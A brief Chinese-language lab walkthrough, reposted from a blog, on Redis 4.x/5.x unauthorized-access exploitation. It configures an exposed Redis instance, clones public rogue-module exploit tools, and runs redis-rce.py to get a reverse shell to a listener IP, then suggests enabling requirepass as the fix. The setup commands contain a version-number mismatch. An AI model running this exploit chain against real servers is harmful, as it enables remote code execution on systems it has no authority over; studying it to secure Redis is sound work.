Redis 4.x 5.x 未授权访问

环境搭建

5.0版本下载

wget http://download.redis.io/releases/redis-5.0.5.tar.gz

tar xzf redis-5.0.0.tar.gz
cd redis-5.0.5 make

修改配置文件运行远程访问

1、将redis.conf文件中的bind 127.0.0.1 这行前面加注释(#)； 2、将redis.conf文件中的 protected-mode yes 改为no；

运行Redis

./redis-server /root/redis/redis-5.0.0/redis.conf

 

下载EXP

git clone [url]https://github.com/Ridter/redis-rce.git[/url]
git clone [url]https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git[/url]

 

编译module.so文件：

将编译完的module.so复制到redis-rce目录下，然后执行以下命令：

python redis-rce.py -r 127.0.0.1 -L 127.0.0.1 -f module.so

 -r参数是指远程Redis IP地址； -L参数是指反弹到的服务器IP地址； 执行命令后，开启监听了本地的60720端口，并成功反弹回了shell。

 

 

修复建议

这是针对redis未授权访问的漏洞 这里直接redis.conf文件里面的  requirepass 参数取消注释   这里5.0是默认开启未授权访问的

 

转载于:https://www.cnblogs.com/-zhong/p/11165655.html